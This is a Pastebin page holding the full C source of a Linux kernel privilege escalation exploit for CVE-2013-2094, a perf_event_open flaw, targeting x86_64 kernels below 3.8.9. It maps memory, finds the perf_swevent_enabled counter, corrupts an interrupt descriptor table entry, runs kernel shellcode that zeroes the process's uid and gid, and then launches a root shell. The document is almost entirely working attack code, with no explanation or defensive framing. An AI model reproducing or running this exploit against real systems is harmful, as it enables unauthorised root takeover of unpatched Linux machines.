API tools faq
paste
The_KGB

Linux privilege escalation exploit - June 2013

The_KGB
Jun 12th, 2013
144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.32 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.  * CVE-2013-2094 exploit x86_64 Linux < 3.8.9
  3.  * by sorbo (sorbo@darkircop.org) June 2013
  4.  *
  5.  * Based on sd's exploit.  Supports more targets.
  6.  *
  7.  */
  8.  
  9. #define _GNU_SOURCE
  10. #include <string.h>
  11. #include <stdio.h>
  12. #include <unistd.h>
  13. #include <stdlib.h>
  14. #include <stdint.h>
  15. #include <sys/syscall.h>
  16. #include <sys/mman.h>
  17. #include <linux/perf_event.h>
  18. #include <signal.h>
  19. #include <assert.h>
  20.  
  21. #define BASE        0x380000000
  22. #define BASE_JUMP   0x1780000000
  23. #define SIZE        0x10000000
  24. #define KSIZE       0x2000000
  25.  
  26. #define TMP(x) (0xdeadbeef + (x))
  27.  
  28. struct idt {
  29.     uint16_t limit;
  30.     uint64_t addr;
  31. } __attribute__((packed));
  32.  
  33. static int _fd;
  34.  
  35. static int perf_open(uint64_t off)
  36. {
  37.     struct perf_event_attr attr;
  38.     int rc;
  39.  
  40. //  printf("perf open %lx [%d]\n", off, (int) off);
  41.  
  42.     memset(&attr, 0, sizeof(attr));
  43.  
  44.     attr.type           = PERF_TYPE_SOFTWARE;
  45.     attr.size           = sizeof(attr);
  46.     attr.config         = off;
  47.     attr.mmap           = 1;
  48.     attr.comm           = 1;
  49.     attr.exclude_kernel = 1;
  50.  
  51.     rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
  52.  
  53.     return rc;
  54. }
  55.  
  56. void __sc_start(void);
  57. void __sc_next(void);
  58.  
  59. void __sc(void)
  60. {
  61.     asm("__sc_start:\n"
  62.         "call __sc_next\n"
  63.         "iretq\n"
  64.         "__sc_next:\n");
  65. }
  66.  
  67. void sc(void)
  68. {
  69.     int i, j;
  70.     uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));
  71.     uint64_t kbase = ((uint64_t)current) >> 36;
  72.     int uid = TMP(1);
  73.     int gid = TMP(2);
  74.  
  75.     for (i = 0; i < 4000; i += 4) {
  76.         uint64_t *p = (void *) ¤t[i];
  77.         uint32_t *cred = (uint32_t*) p[0];
  78.  
  79.         if ((p[0] != p[1]) || ((p[0]>>36) != kbase))
  80.             continue;
  81.  
  82.         for (j = 0; j < 20; j++) {
  83.             if (cred[j] == uid && cred[j + 1] == gid) {
  84.                 for (i = 0; i < 8; i++) {
  85.                     cred[j + i] = 0;
  86.                     return;
  87.                 }
  88.             }
  89.         }
  90.     }
  91. }
  92.  
  93. static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)
  94. {
  95.     void *p;
  96.  
  97.     p = memmem(sc, 900, &needle, sizeof(needle));
  98.     if (!p)
  99.         errx(1, "can't find %x", needle);
  100.  
  101.     memcpy(p, &val, sizeof(val));
  102. }
  103.  
  104. static void *map_mem(uint64_t addr)
  105. {
  106.     void *p;
  107.  
  108.     p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,
  109.          MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
  110.  
  111.     if (p == MAP_FAILED)
  112.         err(1, "mmap()");
  113.  
  114.     return p;
  115. }
  116.  
  117. static int find_mem(void *mem, uint8_t c)
  118. {
  119.     int i;
  120.     uint8_t *p = mem;
  121.  
  122.     for (i = 0; i < SIZE; i++) {
  123.         if (p[i] == c)
  124.             return i;
  125.     }
  126.  
  127.     return -1;
  128. }
  129.  
  130. static void dropshell()
  131. {
  132.     if (setuid(0) != 0)
  133.         errx(1, "failed");
  134.  
  135.     printf("Launching shell\n");
  136.  
  137.     execl("/bin/sh", "sh", NULL);
  138.     exit(0);
  139. }
  140.  
  141. void morte(int x)
  142. {
  143.     printf("Got signal\n");
  144.     close(_fd);
  145.     dropshell();
  146. }
  147.  
  148. static void trigger(int intr)
  149. {
  150.     switch (intr) {
  151.     case 0:
  152.         do {
  153.             int z = 1;
  154.             int a = 1;
  155.  
  156.             z--;
  157.  
  158.             a /= z;
  159.         } while (0);
  160.         break;
  161.  
  162.     case 4:
  163.         asm("int $4");
  164.         break;
  165.  
  166.     case 0x80:
  167.         asm("int $0x80");
  168.         break;
  169.  
  170.     default:
  171.         errx(1, "unknown intr %d", intr);
  172.     }
  173.  
  174.     sleep(3);
  175. }
  176.  
  177. int main(int argc, char *argv[])
  178. {
  179.     uint32_t *p[2];
  180.     int fd, i;
  181.     uint64_t off;
  182.     uint64_t addr = BASE;
  183.     struct idt idt;
  184.     uint8_t *kbase;
  185.     int sz = 4;
  186.     int intr = 4;
  187.  
  188.     printf("Searchin...\n");
  189.  
  190.     p[0] = map_mem(BASE);
  191.     p[1] = map_mem(BASE_JUMP);
  192.  
  193.     memset(p[1], 0x69, SIZE);
  194.  
  195.     off = 0xFFFFFFFFL;
  196.     fd = perf_open(off);
  197.     close(fd);
  198.  
  199.     i = find_mem(p[0], 0xff);
  200.     if (i == -1) {
  201.         i = find_mem(p[1], 0x68);
  202.  
  203.         if (i == -1)
  204.             errx(1, "Can't find overwrite");
  205.  
  206.         sz = 24;
  207.         addr = BASE_JUMP;
  208.         printf("detected CONFIG_JUMP_LABEL\n");
  209.     }
  210.  
  211.     munmap(p[0], SIZE);
  212.     munmap(p[1], SIZE);
  213.  
  214.     addr += i;
  215.     addr -= off * sz;
  216.  
  217.     printf("perf_swevent_enabled is at 0x%lx\n", addr);
  218.  
  219.     asm("sidt %0" : "=m" (idt));
  220.  
  221.     printf("IDT at 0x%lx\n", idt.addr);
  222.  
  223.     off = addr - idt.addr;
  224.     off -= 8;
  225.  
  226.     switch (off % sz) {
  227.     case 0:
  228.         intr = 0;
  229.         break;
  230.  
  231.     case 8:
  232.         intr = 0x80;
  233.         break;
  234.  
  235.     case 16:
  236.         intr = 4;
  237.         break;
  238.  
  239.     default:
  240.         errx(1, "remainder %d", off % sz);
  241.     }
  242.  
  243.     printf("Using interrupt %d\n", intr);
  244.  
  245.     off -= 16 * intr;
  246.  
  247.     assert((off % sz) == 0);
  248.  
  249.     off /= sz;
  250.     off = -off;
  251.  
  252. //  printf("Offset %lx\n", off);
  253.  
  254.     kbase = (uint8_t*) (idt.addr & 0xFF000000);
  255.  
  256.     printf("Shellcode at %p\n", kbase);
  257.  
  258.     if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
  259.          MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
  260.         err(1, "mmap()");
  261.  
  262.     memset(kbase, 0x90, KSIZE);
  263.     kbase += KSIZE - 1024;
  264.  
  265.     i = __sc_next - __sc_start;
  266.     memcpy(kbase, __sc_start, i);
  267.     kbase += i;
  268.     memcpy(kbase, sc, 900);
  269.  
  270.     sc_replace(kbase, TMP(1), getuid());
  271.     sc_replace(kbase, TMP(2), getgid());
  272.  
  273.     signal(SIGALRM, morte);
  274.     alarm(2);
  275.  
  276.     printf("Triggering sploit\n");
  277.     _fd = perf_open(off);
  278.  
  279.     trigger(intr);
  280.  
  281.     exit(0);
  282. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!